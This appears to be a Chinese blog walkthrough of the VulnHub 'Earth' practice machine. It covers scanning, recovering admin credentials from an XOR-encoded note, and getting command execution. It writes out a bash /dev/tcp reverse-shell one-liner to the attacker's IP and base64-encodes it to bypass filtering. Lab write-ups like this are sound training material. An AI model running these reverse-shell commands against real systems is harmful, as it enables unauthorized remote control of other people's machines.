使用命令在kali查看靶机ip
arp-scan -l
尝试访问ip
尝试使用御剑扫描子域名
什么也没有
尝试扫描端口
nmap -A ip
获得443端口的域名,以及dns
vim /etc/hosts
earth.local
terratest.earth.local
尝试访问,在kali中访问
dirb 扫描一下
发现子域名
尝试访问一下
http://earth.local/admin/login
发现需要登录,查看其他域名
https://terratest.earth.local/robots.txt
https://terratest.earth.local/testingnotes.txt
翻译一下
尝试访问.txt文件,得知这个是xor秘钥
要解码的是
由于解密出来是循环的,所以密码取前面的
密码:earthclimatechangebad4humans
账号:terra
登录成功
反弹shell
kali的ip
echo "bash -c 'bash -i >& /dev/tcp/192.168.19.129/2233 0>&1'" | base64
YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5LjEyOS8yMjMzIDA+JjEnCg==
在命令框执行命令
echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5LjEyOS8yMjMzIDA+JjEnCg== | base64 -d | bash
监听成功
标签:尝试,ip,访问,域名,vulnhub,earth,Earth,靶机,local From: https://blog.csdn.net/l258282/article/details/144948226